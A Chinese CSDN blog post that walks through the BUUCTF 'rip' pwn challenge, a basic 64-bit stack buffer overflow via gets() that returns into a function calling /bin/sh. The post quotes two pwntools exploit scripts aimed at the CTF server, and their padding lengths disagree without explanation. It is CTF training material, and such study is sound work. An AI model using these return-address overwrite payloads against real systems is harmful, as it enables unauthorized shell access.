buuctf-rip

最新推荐文章于 2024-07-12 16:34:36 发布
最新推荐文章于 2024-07-12 16:34:36 发布
阅读量336 收藏 4
点赞数 4
分类专栏: Pwn buuctf 文章标签: linux 运维 服务器 buuctf pwn
加油加油~
本文链接:https://blog.csdn.net/wcj126/article/details/139664219
版权
buuctf 同时被 2 个专栏收录
20 篇文章 1 订阅
订阅专栏
Pwn
7 篇文章 1 订阅
订阅专栏

偶尔学学pwn,感觉re到了后面不可避免学pwn

先执行程序

看一下文件保护

file 和checksec指令

二进制的保护机制 (mamicode.com)

目前我也不会啥,这个 no cannary 就是我需要学的 没有栈溢出的保护

IDA 64打开附件

 这就是我们的链接靶机看见的

然后我看wp说,我们要利用bin/sh获取shell权限

在fun函数这里,可以看见执行这个fun函数就可以了

总体思路 利用get来得到栈溢出的目的,在溢出中加入fun的返回地址,达到获取交互界面的权限

栈溢出思路:

查看S有多少个

        

15个

又因为是64为,我们要加上8字节(类似于平衡堆栈最后返回地址,如果是32位,我们要加上4字节)

 地址

exp

BUUCTF pwn题 rip_buuctfrip-CSDN博客

from pwn import *
ghust = remote("node5.buuoj.cn",25521)
addr = 0x40118a
payload = b'A' * 15 + b'B'*8 + p64(addr)
ghust.sendline(payload)
ghust.interactive()

BUUCTF PWN-RIP详解_buuctf rip-CSDN博客 


from pwn import *

#p = process('./pwn1')
p = remote('node5.buuoj.cn', 25521)
payload='A'*23+'B'*8+p64(0x401186+1).decode()

p.sendline(payload)
p.interactive()

 

_Nickname
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1520
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
pwn基础入门-buuctf-2.rip
weixin_49765221的博客
05-21 1145
将下载下来的pwn1文件内容,放到ubuntu中checksec一下。
BUUCTF-rip
m0_64180167的博客
04-11 658
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
PWN学习记录(2)BUUCTF-rip
m0_58824086的博客
07-31 259
gets函数的缓冲区是由用户本身提供,由于用户无法指定一次最多可读入多少字节,导致此函数存在巨大安全隐患。换句话来说,就是gets若没有遇到\n 结束,则会无限读取,没有上限。由**char s[15]**可得,在main函数的栈帧中,划分了一个15字节的存储空间,也就是说只需要存入15个字节地址,就可以get函数返回地址。可以发现,这是一个64位的ELF文件,可得每个存储单元是8个字节,即一个字节是8位,同理32位就是4个字节。dup():重复定义圆括号中指定的初值,次数由前面的数值决定。
BUUCTF -rip
weixin_56301399的博客
07-20 385
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
win7-32位安装Linotronic 530-RIP 30 v52.3.rar
07-31
《在Windows 7 32位系统中安装Linotronic 530-RIP 30 v52.3的详细指南》 在数字印刷领域,RIP(Raster Image Processor,光栅图像处理器)扮演着至关重要的角色。Linotronic 530-RIP 30 v52.3是一款专业的RIP软件,...
计算机网络实验-RIP实验报告.pdf
04-21
RIP实验报告,计算机网络实验 如果拓扑图如图 11-7 所示,应该如何配置才能使所有 PC 机相互通信? 如果是 3 个路由器组成的拓扑图如图 11-8 所示,应该如何配置才能使 所有 PC 机相互通信?
华为模拟器eNSP练习题-RIP
01-04
【华为模拟器eNSP与RIP协议详解】 在IT领域,华为eNSP(Enterprise Network Simulation Platform)是一款强大的网络仿真工具,它允许用户在虚拟环境中构建和测试网络配置,以便学习和验证网络技术。本实验主要围绕...
思科-RIP的基础配置
04-07
内容概要:配置RIP动态路由和默认路由,使用相应的RIP和静态两种路由协议实现网络的互通,加深对动态路由能够减少一定的配置量这一规律的理解。 适合人群:初学路由交换技术的学生、或者对路由交换与交换的人群。 ...
IP路由-RIP与静态路由-重复布.docx
02-24
IP 路由-RIP 与静态路由-重复布 本文档介绍了 IP 路由的配置,包括 RIP 路由和静态路由的配置,重点介绍了 RIP 路由协议的配置和静态路由的配置,以及它们之间的重发布机制。 一、网络拓扑环境 本文档的网络拓扑...
Linux C | 管道open打开方式
最新发布
I_feige的博客
07-12 238
1.
【Linux】进程间通信——匿名管道
2201_76024104的博客
07-08 1142
1.:一个进程需要将它的数据发送给另一个进程,比如我们有两个进程,一个负责获取数据,另一个负责处理数据,这时第一个进程就要将获取到的数据交给第二个进程2.:多个进程间共享同样的资源3.:一个进程需要给其他进程发送消息,通知他们发生了某种事件4.:有些事件需要完全控制另一个进程,比如我们在使用gdb调试时,gdb就是一个进程,它控制了我们要调试的进程进程之前是有互相传递信息的需求,但是,一个进程不可能去另一个进程的地址空间中取信息,所以这就要求操作系统去提供一块交换数据的空间来供进程之间使用。
建立共享linux第三方软件仓库
Znj1421304181的博客
07-08 211
【代码】建立共享linux第三方软件仓库。
Linux 系统安全加固:深入 SELinux 与 AppArmor
weixin_39372311的博客
07-08 851
SELinux 和 AppArmor 是两款强大的 Linux 安全模块,它们可以帮助你加固 Linux 系统安全,防止未经授权的访问和恶意行为。通过学习它们的原理、配置和使用方法,你可以更好地保护 Linux 系统安全,确保其稳定运行。
【Linux系列2】Cmake安装记录
kewaqi618的博客
07-08 1032
主要介绍Cmake的安装方法,及自己安装的过程
Linux 安装 Docker Compose
m0_63004677的博客
07-12 202
Linux 系统安装 Docker Compose
保姆级教程:Linux (Ubuntu) 部署流光卡片开源 API
梦染 * 星尘 的博客
07-09 831
流光卡片 API 开源地址 Github:https://github.com/ygh3279799773/streamer-card流光卡片 API 开源地址 Gitee:https://gitee.com/y-gh/streamer-card流光卡片在线使用地址:https://fireflycard.shushiai.com/想要使用 api 调用服务,需要有一个服务器来时刻监听请求。服务器终端界面阅读不方便,因此需要使用宝塔面板进行管理。
【Linux】:程序替换
Yikefore的博客
07-09 1069
程序替换的详细介绍以及各种程序替换接口介绍以及使用!
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_Nickname

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值